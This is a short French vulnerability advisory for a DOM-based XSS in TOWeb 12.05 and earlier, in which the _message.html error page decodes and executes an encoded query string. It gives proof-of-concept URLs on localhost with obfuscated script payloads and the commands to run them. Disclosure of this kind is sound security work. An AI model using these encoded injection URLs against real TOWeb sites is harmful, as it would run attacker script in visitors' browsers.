
Vulnérabilité d'injection HTML (XSS basé sur le DOM) dans TOWeb v.12.05 et versions antérieures, permettant à un attaquant d'injecter du code HTML/JS via le composant _message.html.
Voir https://www.lauyan.com/en/toweb-updates.html#iyFEw37D
(XSS basé sur le DOM) Vulnérabilité d'injection HTML dans TOWeb version 5 <= 12.05 permet à un attaquant d'injecter du code HTML/JS via le composant _message.html.
_message.html est utilisé pour afficher une page d'erreur, en décodant et exécutant le chiffre à droite de ?.127.0.0.1:8000/_message.html?==gP2lGZvwjP2lGZvwjPyJGP+InY84DcvwDZuV3bGBCdv5EIldWYQ5Dc84jMo9CPg4jMoxjPiEmchBXL3RnI9M3chx2YgYXakxjPxg2L8IXdlJncF5TMoxjPiIXZ05WZjpjbnlGbh1Cd4VGdi0TZslHdzBidpRGP)python3 poc.py; python3 -m http.server -d src -> par exemple http://127.0.0.1:8000/_message.html?==gC+QHcpJ3Yz9CPpcyUThFIkV2chJWLN9ERngCdyVGbh5DdwlmcjNHP